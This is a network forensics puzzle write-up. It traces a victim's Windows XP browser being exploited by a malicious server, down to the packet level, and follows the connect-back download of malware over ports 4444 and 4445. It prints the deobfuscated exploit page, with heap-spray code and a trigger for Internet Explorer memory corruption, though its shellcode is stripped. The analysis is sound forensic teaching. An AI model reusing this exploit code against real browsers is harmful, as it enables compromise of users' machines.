Name: Iulian Anton

Actors:

    Ann Dercover - bad girl - 10.10.10.10 - malware server
    Vick Timmes - good guy - 10.10.10.70

Here is the summary of the network conversation:

10.10.10.70 -> clicks on exploit page (10.10.10.10)
10.10.10.10 -> sends the exploit
10.10.10.70 -> executes the exploit and downloads the malicious code
10.10.10.70 -> connects to 10.10.10.10 on port 4444
10.10.10.70 download the malware
10.10.10.10 and 10.10.10.70 -> communicates to each others using ssl v3
10.10.10.70 tries to connect to 10.10.10.10 on port 4445 several times (failed attempts)
10.10.10.70 closes connecton on potr 4444
10.10.10.70 tries to connect to 10.10.10.10 on port 4445 several times
10.10.10.70 connects to 10.10.10.10 on port 4445
10.10.10.70 download again the same malware
10.10.10.10 and 10.10.10.70 -> communicates to each others using ssl v3
10.10.10.70 closes connecton on potr 4445

I used Wireshark (http://www.wireshark.org/download.html) to view the evidence.pcap file.
In the first packet we see that Vick opens the url: http://10.10.10.10:8080/index.php (answer for the first question).

Here is the http header from the first packet:

    GET /index.php HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: 10.10.10.10:8080
    Connection: Keep-Alive


Things we can notice:

    1. The port is 8080 (the alternative http port) and not the default http port(80). (default port for metasploit - clue)

    2. The header doesn't contain any referer so maybe Vick copied/pasted the link into the browser or he doesn't use a web based mail client.

    3. The user agent tag from the header offers useful informations. The browser (MSIE 6.0) is Microsoft Internet Explorer 6, the operating system (Windows NT 5.1) is Windows XP. The token SV1 sugests that Vick uses Internet Explorer 6 with enhanced security features. This is available only in Windows XP SP2 and Windows Server 2003 only. So, the OS is Windows XP with SP2. More information about UserAgent string format and tokens from Microsoft is available on MSDN at: http://msdn.microsoft.com/en-us/library/ms537503(VS.85).aspx (Understanding User-Agent Strings).

In the next packet can be found the ACK response from the server.

The server response header can be found in the next packet:
    HTTP/1.1 200 OK
    Content-Type: text/html
    Pragma: no-cache
    Connection: Keep-Alive
    Server: Apache
    Content-Length: 5748

Therefore, we see from the response that the server is Apache. It seems to be a metasploit server because, by default, a standard apache sends more information in the header.
The content of this response contains the exploit (packets 3,4,5,6,8). It's a html code that has an obfuscated JavaScript.

Unobfuscated and commented JavaScript code:

-------------------START--index.php-------------------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var commentString = "COMMENT";
var commentArray = new Array();

//create 1300 coments with 3 characters in data
for (i = 0; i < 1300; i++)
{
  commentArray[i] = document.createElement(commentString);
  commentArray[i].data = "vEI";
}

var evObject = null;
var payloadArray = new Array();
var unescapeFunction = unescape; //redefine unescape function. Used for code obfuscation.
function preparePayload()
{
  //partialy encrypted downloader opcodes
  var payloadString = unescapeFunction('%u0d9b%u2cb8[CONTENT STRIPPED]%u0956%u6524);

  //0c 0d => or al,0x0d - harmless code
  //0c 0d 0c 0d is also the address that will be overwritten
  var heapSpray = unescapeFunction( "%u0c0d%u0c0d" );

  //the main heap spray 851,986 bytes
  do { heapSpray += heapSpray } while( heapSpray.length < 0xd0000 );

  //creates 150 x heapSpray + shellcode
  for (PEf = 0; PEf < 150; PEf++) payloadArray[PEf] = heapSpray + payloadString;
}
function onloadEvent(eventParam)
{
  preparePayload();
  evObject = document.createEventObject(eventParam);

  //remove the iframe containing the image
  document.getElementById("spanElementId").innerHTML = "";
  window.setInterval(changeCommentData, 50);
}
function changeCommentData()
{
  p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
  for (i = 0; i < commentArray.length; i++)
  {
    commentArray[i].data = p;
  }
  var t = evObject.srcElement;
}
</script>
</head>
<body>
<span id="spanElementId"><iframe src="/index.phpmfKSxSANkeTeNrah.gif" onload="onloadEvent(event)" /></span></body></html>
</body>
</html>
-------------------END--index.php-------------------------

In the next packet (no. 9) we see the browser request for the gif file from the iframe within the index.php. Here is the html header:

GET /index.phpmfKSxSANkeTeNrah.gif HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://10.10.10.10:8080/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 10.10.10.10:8080
Connection: Keep-Alive

The gif file name is "index.phpmfKSxSANkeTeNrah.gif".
Now we have the referer tag. This can indicate that the initial page was opened in a legitimate browser.
There is nothing special with the image. It's a 1 by 1  one frame gif file.

In the next packet we see the ACK and after that we notice the HTTP 200 OK response from the server. This packet contains the 43 byte image file.

We can manualy extract those 2 files using wireshark or we can use a dedicated tool to do that:
    -xplico ( http://www.xplico.org/ );
    -tcpxtract ( http://sourceforge.net/projects/tcpxtract/ ).

I've used tcpxtract:

command:
./tcpxtract --file ../puzzle-6/evidence06.pcap --output ../puzzle-6/extracted/html/

output:

Found file of type "html" in session [10.10.10.10:36895 -> 10.10.10.70:2820], exporting to ../puzzle-6/extracted/html/00000000.html
Found file of type "gif" in session [10.10.10.10:36895 -> 10.10.10.70:2820], exporting to ../puzzle-6/extracted/html/00000001.gif


we notice that it doesn't preserve the file names. So the first file (00000000.html) is named "index.php" (from packet #1) and the second file (00000001.gif) is named "index.phpmfKSxSANkeTeNrah.gif (from packet #9)"

Next follows a 3-way handshake(more information here: http://en.wikipedia.org/wiki/Transmission_Control_Protocol#Connection_establishment):

10.10.10.70 sends a TCP SYNchronize packet to 10.10.10.10
10.10.10.10 receives 10.10.10.70's SYN
10.10.10.10 sends a SYNchronize-ACKnowledgement
10.10.10.70 receives 10.10.10.10's SYN-ACK
10.10.10.70 sends ACKnowledge
10.10.10.10 receives ACK.
TCP socket connection is ESTABLISHED on port 4444 (also default port for matesploit framework.).

Thus, at this stage Vick's browser connects back to the malicious server on port 4444. The server responses with a 4 bytes data (0x006A0B00 - which is a memory representation of 748032) which we will see later from the downloader analysis, these 4 bytes data being the length of the malware. Packets 16 to 716 contain the malware code.

From packet 717 the client and server begin a SSLv3 conversation.This resulted further to the analysis of the malware code.

Using information taken from http://en.wikipedia.org/wiki/Transport_Layer_Security and http://www.mozilla.org/projects/security/pki/nss/ssl/draft302.txt we can simply decode SSL headers:


Content types:
Hex     Dec     Type
0x14     20     ChangeCipherSpec
0x15     21     Alert
0x16     22     Handshake
0x17     23     Application

Versions:

Major Version     Minor Version     Version Type
3     0     SSLv3
3     1     TLS 1.0
3     2     TLS 1.1
3     3     TLS 1.2

Message Types:
Code     Description
0     HelloRequest
1     ClientHello
2     ServerHello
11     Certificate
12     ServerKeyExchange
13     CertificateRequest
14     ServerHelloDone
15     CertificateVerify
16     ClientKeyExchange
20     Finished

The first SSL packet:

0000   16 03 00 00 59 01 00 00 55 03 00 4b d8 d5 39 97
0010   3b b0 72 e7 4d 83 cf 7a b0 43 35 fc da fe 9d 14
0020   2c 6c 8f 83 88 64 f9 75 84 8b 8c 00 00 28 00 39
0030   00 38 00 35 00 16 00 13 00 0a 00 33 00 32 00 2f
0040   00 07 00 05 00 04 00 15 00 12 00 09 00 14 00 11
0050   00 08 00 06 00 03 01 00 00 04 00 23 00 00

Decoded packet:

0x16 -> Handshake
    0x03 0x00 -> SSLv3
    0x00 0x59 -> Decimal Length = 89
    0x01 -> ClientHello
    0x00 0x00 0x55  -> Decimal Length = 85
        0x03 0x00 -> SSLv3
            0x4b 0xd8 0xd5 0x39-> Unix time (Apr 29, 2010 03:39:21)
            0x97 0x3b 0xb0 0x72 0xe7 0x4d 0x83 0xcf 0x7a 0xb0 0x43 0x35 0xfc 0xda 0xfe 0x9d 0x14 0x2c 0x6c 0x8f 0x83 0x88 0x64 0xf9 0x75 0x84 0x8b 0x8c - > Random
        0x00 -> Session ID Length
        0x00 0x28 -> Cipher Suites Length = 40 (20 x2 bytes per Chiper)
            0x00 0x39 -> Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)
            0x00 0x38 -> Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038)
            00 35 -> etc.
            00 16
            00 13
            00 0a
            00 33
            00 32
            00 2f
            00 07
            00 05
            00 04
            00 15
            00 12
            00 09
            00 14
            00 11
            00 08
            00 06
            00 03
         0x01 -> Compression method length
            0x00 -> Compression method: none
        0x00 0x04 -> Extension length
            0x00 0x23 -> SessionTicket TLS
            0x00  -> Length
            0x00  -> Data

After some manual decoding I've found out that if we export those packets into a new pcap file we can decode the traffic as SSL using Wireshark.

Here is the simplified network activity after decoding the file automatically:

10.10.10.70 -> 10.10.10.10    SSL        Client Hello
10.10.10.10 -> 10.10.10.70    SSLv3    Server Hello, Certificate, Server Key Exchange, Server Hello Done
10.10.10.70 -> 10.10.10.10    SSLv3    Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
10.10.10.10 -> 10.10.10.70    SSLv3    Change Cipher Spec, Encrypted Handshake Message

lots of:
{
    10.10.10.70 -> 10.10.10.10    SSLv3    Application Data, Application Data
    10.10.10.10 -> 10.10.10.70    SSLv3    Application Data, Application Data
}

10.10.10.10 -> 10.10.10.70    SSLv3    Encrypted Alert

From the Server Hello we found out that the cipher used is TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039) which is almost impossible to crack even if we have the server key which we don't. More information can be found on http://www.unleashnetworks.com/blog/?p=28 and http://taosecurity.blogspot.com/2007/01/wireshark-display-filters-and-ssl.html .
We can extract the certificate to obtain some useful information.
    Valid from:   14.04.2010 11:24:42 GMT
    valid until:    14.05.2010 18:44:59 GMT
As expected, the certificate authority is invalid.
We also find out that organization and locality are some random characters. Due to this finding, we may think about metasploit.
Metasploit is using SLL for some time now: http://www.darkoperator.com/blog/2009/7/14/meterpreter-stealthier-than-ever.html .

At packet [1153] the malware tries to connect back to 10.10.10.10 on port 4445.
Follows some failed attempts to connect to port 4445.
The server sends a FIN tcp message for port 4444.
After some failed attempts to connect to server on port 4445, the client finally connects to the server on port 4445. It's the same behavior as on port 4444. The client download the same malware and then uses SSLv3 to communicate with the server.

Finally we can notice at packet [1243] a Browser Announcement:
1243    55.409175    10.10.10.70    10.10.10.255    BROWSER    Host Announcement SAUCYDEV, Workstation, Server, NT Workstation

For answering the questions i've write for the first time a perl code.
The first perl code "pcap.ref.2.pl" can extract the PE files and calculate the MD5 of its. It also contains the first version of the question 7 resolver.

yul@bt:~/develop/nf-puzzle/puzzle-6$ ./pcap.ref.2.pl -s evidence06.pcap -v
Filename [index.php], MD5 [a0b6322a2e09183a6a3b2533b6c8dba2]
Filename [index.phpmfKSxSANkeTeNrah.gif], MD5 [df3e567d6f16d040326c7a0ea29a4f41]
Filename [evidence06.pcap], MD5 [efac05c50c0ae92bf0818e98763920bd]
ACK flag found:24
ACK sq num: 1923926395
[17] -> Found file size (4): 748032.
        Dumping packets to file_1.pe.
        [716] -> File dump finished length [748032].
        [1562] --> FIN & ACK found. Changing port.
ACK flag found:24
ACK sq num: 1979373165
[1659] -> Found file size (4): 748032.
        Dumping packets to file_2.pe.
        [2344] -> File dump finished length [748032].
        [2553] --> FIN & ACK found. Changing port.
Packets: [2553]
[15] -> SYN ACK found.
[1156] -> 10.10.10.70:4445 -> IP identification changed from [359] to [360]. Count [1], seconds [0].
[1158] -> 10.10.10.70:4445 -> IP identification changed from [360] to [361]. Count [1], seconds [1].
[1160] -> 10.10.10.70:4445 -> IP identification changed from [361] to [362]. Count [1], seconds [0].
[1160] -> 10.10.10.70:4445 -> Sequence number changed from [553522758] to [553800369]. Count [3], seconds [1].
[1162] -> 10.10.10.70:4445 -> IP identification changed from [362] to [363]. Count [1], seconds [0].
[1164] -> 10.10.10.70:4445 -> IP identification changed from [363] to [364]. Count [1], seconds [1].
[1166] -> 10.10.10.70:4445 -> IP identification changed from [364] to [365]. Count [1], seconds [0].
[1166] -> 10.10.10.70:4445 -> Sequence number changed from [553800369] to [554100968]. Count [3], seconds [1].
[1168] -> 10.10.10.70:4445 -> IP identification changed from [365] to [366]. Count [1], seconds [0].
[1175] -> 10.10.10.70:4445 -> IP identification changed from [366] to [369]. Count [1], seconds [1].
[1177] -> 10.10.10.70:4445 -> IP identification changed from [369] to [370]. Count [1], seconds [0].
[1177] -> 10.10.10.70:4445 -> Sequence number changed from [554100968] to [554399680]. Count [3], seconds [1].
[1179] -> 10.10.10.70:4445 -> IP identification changed from [370] to [371]. Count [1], seconds [0].
[1181] -> 10.10.10.70:4445 -> IP identification changed from [371] to [372]. Count [1], seconds [1].
[1183] -> 10.10.10.70:4445 -> IP identification changed from [372] to [373]. Count [1], seconds [0].
[1183] -> 10.10.10.70:4445 -> Sequence number changed from [554399680] to [554670846]. Count [3], seconds [1].
[1185] -> 10.10.10.70:4445 -> IP identification changed from [373] to [374]. Count [1], seconds [0].
[1187] -> 10.10.10.70:4445 -> IP identification changed from [374] to [375]. Count [1], seconds [1].
[1199] -> 10.10.10.70:4445 -> IP identification changed from [375] to [380]. Count [1], seconds [7].
[1199] -> 10.10.10.70:4445 -> Sequence number changed from [554670846] to [1209506360]. Count [3], seconds [8].
[1199] -> 10.10.10.70:4445 -> Source port changed from [1037] to [1038]. Count [15], seconds [12].
[1201] -> 10.10.10.70:4445 -> IP identification changed from [380] to [381]. Count [1], seconds [0].
[1208] -> 10.10.10.70:4445 -> IP identification changed from [381] to [384]. Count [1], seconds [0].
[1210] -> 10.10.10.70:4445 -> IP identification changed from [384] to [385]. Count [1], seconds [0].
[1210] -> 10.10.10.70:4445 -> Sequence number changed from [1209506360] to [1209784551]. Count [3], seconds [0].
[1212] -> 10.10.10.70:4445 -> IP identification changed from [385] to [386]. Count [1], seconds [1].
[1214] -> 10.10.10.70:4445 -> IP identification changed from [386] to [387]. Count [1], seconds [0].
[1216] -> 10.10.10.70:4445 -> IP identification changed from [387] to [388]. Count [1], seconds [0].
[1216] -> 10.10.10.70:4445 -> Sequence number changed from [1209784551] to [1210061304]. Count [3], seconds [1].
[1218] -> 10.10.10.70:4445 -> IP identification changed from [388] to [389]. Count [1], seconds [1].
[1230] -> 10.10.10.70:4445 -> IP identification changed from [389] to [394]. Count [1], seconds [1].
[1232] -> 10.10.10.70:4445 -> IP identification changed from [394] to [395]. Count [1], seconds [0].
[1232] -> 10.10.10.70:4445 -> Sequence number changed from [1210061304] to [1210364813]. Count [3], seconds [2].
[1234] -> 10.10.10.70:4445 -> IP identification changed from [395] to [396]. Count [1], seconds [0].
[1236] -> 10.10.10.70:4445 -> IP identification changed from [396] to [397]. Count [1], seconds [1].
[1238] -> 10.10.10.70:4445 -> IP identification changed from [397] to [398]. Count [1], seconds [0].
[1238] -> 10.10.10.70:4445 -> Sequence number changed from [1210364813] to [1210645885]. Count [3], seconds [1].
[1240] -> 10.10.10.70:4445 -> IP identification changed from [398] to [399]. Count [1], seconds [0].
[1242] -> 10.10.10.70:4445 -> IP identification changed from [399] to [400]. Count [1], seconds [1].
[1313] -> 10.10.10.70:4445 -> IP identification changed from [400] to [435]. Count [1], seconds [6].
[1313] -> 10.10.10.70:4445 -> Sequence number changed from [1210645885] to [1622098235]. Count [3], seconds [7].
[1313] -> 10.10.10.70:4445 -> Source port changed from [1038] to [1039]. Count [15], seconds [11].
[1315] -> 10.10.10.70:4445 -> IP identification changed from [435] to [436]. Count [1], seconds [1].
[1317] -> 10.10.10.70:4445 -> IP identification changed from [436] to [437]. Count [1], seconds [0].
[1319] -> 10.10.10.70:4445 -> IP identification changed from [437] to [438]. Count [1], seconds [0].
[1319] -> 10.10.10.70:4445 -> Sequence number changed from [1622098235] to [1622368210]. Count [3], seconds [1].
[1321] -> 10.10.10.70:4445 -> IP identification changed from [438] to [439]. Count [1], seconds [1].
[1323] -> 10.10.10.70:4445 -> IP identification changed from [439] to [440]. Count [1], seconds [0].
[1325] -> 10.10.10.70:4445 -> IP identification changed from [440] to [441]. Count [1], seconds [0].
[1325] -> 10.10.10.70:4445 -> Sequence number changed from [1622368210] to [1622652861]. Count [3], seconds [1].
[1327] -> 10.10.10.70:4445 -> IP identification changed from [441] to [442]. Count [1], seconds [1].
[1329] -> 10.10.10.70:4445 -> IP identification changed from [442] to [443]. Count [1], seconds [0].
[1331] -> 10.10.10.70:4445 -> IP identification changed from [443] to [444]. Count [1], seconds [0].
[1331] -> 10.10.10.70:4445 -> Sequence number changed from [1622652861] to [1622952453]. Count [3], seconds [1].
[1333] -> 10.10.10.70:4445 -> IP identification changed from [444] to [445]. Count [1], seconds [1].
[1335] -> 10.10.10.70:4445 -> IP identification changed from [445] to [446]. Count [1], seconds [0].
[1337] -> 10.10.10.70:4445 -> IP identification changed from [446] to [447]. Count [1], seconds [0].
[1337] -> 10.10.10.70:4445 -> Sequence number changed from [1622952453] to [1623257568]. Count [3], seconds [1].
[1339] -> 10.10.10.70:4445 -> IP identification changed from [447] to [448]. Count [1], seconds [1].
[1341] -> 10.10.10.70:4445 -> IP identification changed from [448] to [449]. Count [1], seconds [0].
[1503] -> 10.10.10.70:4445 -> IP identification changed from [449] to [522]. Count [1], seconds [7].
[1503] -> 10.10.10.70:4445 -> Sequence number changed from [1623257568] to [162229147]. Count [3], seconds [8].
[1503] -> 10.10.10.70:4445 -> Source port changed from [1039] to [1040]. Count [15], seconds [12].
[1505] -> 10.10.10.70:4445 -> IP identification changed from [522] to [523]. Count [1], seconds [1].
[1507] -> 10.10.10.70:4445 -> IP identification changed from [523] to [524]. Count [1], seconds [0].
[1509] -> 10.10.10.70:4445 -> IP identification changed from [524] to [525]. Count [1], seconds [0].
[1509] -> 10.10.10.70:4445 -> Sequence number changed from [162229147] to [162541497]. Count [3], seconds [1].
[1511] -> 10.10.10.70:4445 -> IP identification changed from [525] to [526]. Count [1], seconds [1].
[1513] -> 10.10.10.70:4445 -> IP identification changed from [526] to [527]. Count [1], seconds [0].
[1515] -> 10.10.10.70:4445 -> IP identification changed from [527] to [528]. Count [1], seconds [0].
[1515] -> 10.10.10.70:4445 -> Sequence number changed from [162541497] to [162818052]. Count [3], seconds [1].
[1517] -> 10.10.10.70:4445 -> IP identification changed from [528] to [529]. Count [1], seconds [1].
[1519] -> 10.10.10.70:4445 -> IP identification changed from [529] to [530]. Count [1], seconds [0].
[1521] -> 10.10.10.70:4445 -> IP identification changed from [530] to [531]. Count [1], seconds [0].
[1521] -> 10.10.10.70:4445 -> Sequence number changed from [162818052] to [163088501]. Count [3], seconds [1].
[1523] -> 10.10.10.70:4445 -> IP identification changed from [531] to [532]. Count [1], seconds [0].
[1525] -> 10.10.10.70:4445 -> IP identification changed from [532] to [533]. Count [1], seconds [1].
[1527] -> 10.10.10.70:4445 -> IP identification changed from [533] to [534]. Count [1], seconds [0].
[1527] -> 10.10.10.70:4445 -> Sequence number changed from [163088501] to [163371223]. Count [3], seconds [1].
[1529] -> 10.10.10.70:4445 -> IP identification changed from [534] to [535]. Count [1], seconds [1].
[1531] -> 10.10.10.70:4445 -> IP identification changed from [535] to [536]. Count [1], seconds [0].
[1533] -> 10.10.10.70:4445 -> IP identification changed from [536] to [537]. Count [1], seconds [7].
[1533] -> 10.10.10.70:4445 -> Sequence number changed from [163371223] to [16388086]. Count [3], seconds [8].
[1533] -> 10.10.10.70:4445 -> Source port changed from [1040] to [1041]. Count [15], seconds [12].
[1535] -> 10.10.10.70:4445 -> IP identification changed from [537] to [538]. Count [1], seconds [0].
[1537] -> 10.10.10.70:4445 -> IP identification changed from [538] to [539]. Count [1], seconds [1].
[1539] -> 10.10.10.70:4445 -> IP identification changed from [539] to [540]. Count [1], seconds [0].
[1539] -> 10.10.10.70:4445 -> Sequence number changed from [16388086] to [16656410]. Count [3], seconds [1].
[1541] -> 10.10.10.70:4445 -> IP identification changed from [540] to [541]. Count [1], seconds [0].
[1543] -> 10.10.10.70:4445 -> IP identification changed from [541] to [542]. Count [1], seconds [1].
[1545] -> 10.10.10.70:4445 -> IP identification changed from [542] to [543]. Count [1], seconds [0].
[1545] -> 10.10.10.70:4445 -> Sequence number changed from [16656410] to [16955498]. Count [3], seconds [1].
[1547] -> 10.10.10.70:4445 -> IP identification changed from [543] to [544]. Count [1], seconds [0].
[1549] -> 10.10.10.70:4445 -> IP identification changed from [544] to [545]. Count [1], seconds [1].
[1551] -> 10.10.10.70:4445 -> IP identification changed from [545] to [546]. Count [1], seconds [0].
[1551] -> 10.10.10.70:4445 -> Sequence number changed from [16955498] to [17232987]. Count [3], seconds [1].
[1553] -> 10.10.10.70:4445 -> IP identification changed from [546] to [547]. Count [1], seconds [0].
[1555] -> 10.10.10.70:4445 -> IP identification changed from [547] to [548]. Count [1], seconds [1].
[1557] -> 10.10.10.70:4445 -> IP identification changed from [548] to [549]. Count [1], seconds [0].
[1557] -> 10.10.10.70:4445 -> Sequence number changed from [17232987] to [17511176]. Count [3], seconds [1].
[1559] -> 10.10.10.70:4445 -> IP identification changed from [549] to [550]. Count [1], seconds [0].
[1562] -> FIN ACK found.  Connection closed [10.10.10.10:4444 -> 10.10.10.70:1036]
[1563] -> FIN ACK found.  Connection closed [10.10.10.70:1036 -> 10.10.10.10:4444]
[1566] -> 10.10.10.70:4445 -> IP identification changed from [550] to [553]. Count [1], seconds [1].
[1568] -> 10.10.10.70:4445 -> IP identification changed from [553] to [554]. Count [1], seconds [7].
[1568] -> 10.10.10.70:4445 -> Sequence number changed from [17511176] to [2080465750]. Count [3], seconds [8].
[1568] -> 10.10.10.70:4445 -> Source port changed from [1041] to [1042]. Count [15], seconds [12].
[1570] -> 10.10.10.70:4445 -> IP identification changed from [554] to [555]. Count [1], seconds [0].
[1572] -> 10.10.10.70:4445 -> IP identification changed from [555] to [556]. Count [1], seconds [1].
[1574] -> 10.10.10.70:4445 -> IP identification changed from [556] to [557]. Count [1], seconds [0].
[1574] -> 10.10.10.70:4445 -> Sequence number changed from [2080465750] to [2080738151]. Count [3], seconds [1].
[1576] -> 10.10.10.70:4445 -> IP identification changed from [557] to [558]. Count [1], seconds [0].
[1578] -> 10.10.10.70:4445 -> IP identification changed from [558] to [559]. Count [1], seconds [1].
[1580] -> 10.10.10.70:4445 -> IP identification changed from [559] to [560]. Count [1], seconds [0].
[1580] -> 10.10.10.70:4445 -> Sequence number changed from [2080738151] to [2081050681]. Count [3], seconds [1].
[1582] -> 10.10.10.70:4445 -> IP identification changed from [560] to [561]. Count [1], seconds [0].
[1584] -> 10.10.10.70:4445 -> IP identification changed from [561] to [562]. Count [1], seconds [1].
[1586] -> 10.10.10.70:4445 -> IP identification changed from [562] to [563]. Count [1], seconds [0].
[1586] -> 10.10.10.70:4445 -> Sequence number changed from [2081050681] to [2081358929]. Count [3], seconds [1].
[1588] -> 10.10.10.70:4445 -> IP identification changed from [563] to [564]. Count [1], seconds [0].
[1590] -> 10.10.10.70:4445 -> IP identification changed from [564] to [565]. Count [1], seconds [1].
[1592] -> 10.10.10.70:4445 -> IP identification changed from [565] to [566]. Count [1], seconds [0].
[1592] -> 10.10.10.70:4445 -> Sequence number changed from [2081358929] to [2081664081]. Count [3], seconds [1].
[1594] -> 10.10.10.70:4445 -> IP identification changed from [566] to [567]. Count [1], seconds [0].
[1596] -> 10.10.10.70:4445 -> IP identification changed from [567] to [568]. Count [1], seconds [1].
[1598] -> 10.10.10.70:4445 -> IP identification changed from [568] to [569]. Count [1], seconds [7].
[1598] -> 10.10.10.70:4445 -> Sequence number changed from [2081664081] to [736310972]. Count [3], seconds [8].
[1598] -> 10.10.10.70:4445 -> Source port changed from [1042] to [1043]. Count [15], seconds [12].
[1600] -> 10.10.10.70:4445 -> IP identification changed from [569] to [570]. Count [1], seconds [0].
[1602] -> 10.10.10.70:4445 -> IP identification changed from [570] to [571]. Count [1], seconds [1].
[1604] -> 10.10.10.70:4445 -> IP identification changed from [571] to [572]. Count [1], seconds [0].
[1604] -> 10.10.10.70:4445 -> Sequence number changed from [736310972] to [736614820]. Count [3], seconds [1].
[1606] -> 10.10.10.70:4445 -> IP identification changed from [572] to [573]. Count [1], seconds [0].
[1608] -> 10.10.10.70:4445 -> IP identification changed from [573] to [574]. Count [1], seconds [1].
[1610] -> 10.10.10.70:4445 -> IP identification changed from [574] to [575]. Count [1], seconds [0].
[1610] -> 10.10.10.70:4445 -> Sequence number changed from [736614820] to [736922972]. Count [3], seconds [1].
[1612] -> 10.10.10.70:4445 -> IP identification changed from [575] to [576]. Count [1], seconds [0].
[1614] -> 10.10.10.70:4445 -> IP identification changed from [576] to [577]. Count [1], seconds [1].
[1616] -> 10.10.10.70:4445 -> IP identification changed from [577] to [578]. Count [1], seconds [0].
[1616] -> 10.10.10.70:4445 -> Sequence number changed from [736922972] to [737204271]. Count [3], seconds [1].
[1618] -> 10.10.10.70:4445 -> IP identification changed from [578] to [579]. Count [1], seconds [0].
[1620] -> 10.10.10.70:4445 -> IP identification changed from [579] to [580]. Count [1], seconds [1].
[1622] -> 10.10.10.70:4445 -> IP identification changed from [580] to [581]. Count [1], seconds [0].
[1622] -> 10.10.10.70:4445 -> Sequence number changed from [737204271] to [737475298]. Count [3], seconds [1].
[1624] -> 10.10.10.70:4445 -> IP identification changed from [581] to [582]. Count [1], seconds [0].
[1626] -> 10.10.10.70:4445 -> IP identification changed from [582] to [583]. Count [1], seconds [1].
[1628] -> 10.10.10.70:4445 -> IP identification changed from [583] to [584]. Count [1], seconds [7].
[1628] -> 10.10.10.70:4445 -> Sequence number changed from [737475298] to [1978240123]. Count [3], seconds [8].
[1628] -> 10.10.10.70:4445 -> Source port changed from [1043] to [1044]. Count [15], seconds [12].
[1630] -> 10.10.10.70:4445 -> IP identification changed from [584] to [585]. Count [1], seconds [0].
[1632] -> 10.10.10.70:4445 -> IP identification changed from [585] to [586]. Count [1], seconds [0].
[1634] -> 10.10.10.70:4445 -> IP identification changed from [586] to [587]. Count [1], seconds [0].
[1634] -> 10.10.10.70:4445 -> Sequence number changed from [1978240123] to [1978515768]. Count [3], seconds [0].
[1636] -> 10.10.10.70:4445 -> IP identification changed from [587] to [588]. Count [1], seconds [1].
[1638] -> 10.10.10.70:4445 -> IP identification changed from [588] to [589]. Count [1], seconds [1].
[1640] -> 10.10.10.70:4445 -> IP identification changed from [589] to [590]. Count [1], seconds [0].
[1640] -> 10.10.10.70:4445 -> Sequence number changed from [1978515768] to [1978821279]. Count [3], seconds [2].
[1642] -> 10.10.10.70:4445 -> IP identification changed from [590] to [591]. Count [1], seconds [0].
[1644] -> 10.10.10.70:4445 -> IP identification changed from [591] to [592]. Count [1], seconds [1].
[1646] -> 10.10.10.70:4445 -> IP identification changed from [592] to [593]. Count [1], seconds [0].
[1646] -> 10.10.10.70:4445 -> Sequence number changed from [1978821279] to [1979100318]. Count [3], seconds [1].
[1648] -> 10.10.10.70:4445 -> IP identification changed from [593] to [594]. Count [1], seconds [0].
[1650] -> 10.10.10.70:4445 -> IP identification changed from [594] to [595]. Count [1], seconds [1].
[1652] -> 10.10.10.70:4445 -> IP identification changed from [595] to [596]. Count [1], seconds [0].
[1652] -> 10.10.10.70:4445 -> Sequence number changed from [1979100318] to [1979373164]. Count [3], seconds [1].
[1654] -> 10.10.10.70:4445 -> IP identification changed from [596] to [597]. Count [1], seconds [0].
[1656] -> 10.10.10.70:4445 -> IP identification changed from [597] to [598]. Count [1], seconds [0].
[1657] -> SYN ACK found.
[2552] -> FIN ACK found.  Connection closed [10.10.10.70:1044 -> 10.10.10.10:4445]
[2553] -> FIN ACK found.  Connection closed [10.10.10.10:4445 -> 10.10.10.70:1044]
[1756] packet(s) from 10.10.10.10
[797] packet(s) from 10.10.10.70
Filename [file_1.pe], MD5 [b062cb8344cd3e296d8868fbef289c7c]                  


the seconf script uses SQL database to resolse the puzzle:

yul@bt:~/develop/nf-puzzle/puzzle-6$ ./pcap.mysql.pl -s evidence06.pcap -v
Filename [evidence06.pcap], MD5 [efac05c50c0ae92bf0818e98763920bd]
Rows: 2553 of 0.
Database cleaned.
Rows: 0 of 0.
[1243] Packet ignored. Protocol type [17].
Database filled.
Rows: 2553 of 2554.
[1563] -> Connection on port 4444 ended at second [87.587154].
[1566] -> Connection on 4445 (after 4444 closes) started at second [88.01801].
[1656] -> Connection successfully completed on port 4445 at second [123.674199].

4. Port 4444 connection start at index [15] and time [1.3] second(s).


5. Port 4444 connection end at index [1563] and time [87.6] second(s).


ISN.            Change delay    Packets count   Indexes
[17511176]      [6.860156]              [1]     [1566].
[2080465750]    [0.906120]              [3]     [1568,1570,1572].
[2080738151]    [1.093708]              [3]     [1574,1576,1578].
[2081050681]    [1.093773]              [3]     [1580,1582,1584].
[2081358929]    [1.093744]              [3]     [1586,1588,1590].
[2081664081]    [7.773177]              [3]     [1592,1594,1596].
[736310972]     [1.086184]              [3]     [1598,1600,1602].
[736614820]     [1.093755]              [3]     [1604,1606,1608].
[736922972]     [0.984384]              [3]     [1612,1610,1614].
[737204271]     [0.984374]              [3]     [1620,1616,1618].
[737475298]     [7.758876]              [3]     [1626,1624,1622].
[1978240123]    [0.881730]              [3]     [1628,1632,1630].
[1978515768]    [1.093738]              [3]     [1634,1636,1638].
[1978821279]    [0.984367]              [3]     [1640,1642,1644].
[1979100318]    [0.984372]              [3]     [1648,1650,1646].
[1979373164]    [not availabe]          [3]     [1654,1652,1656].

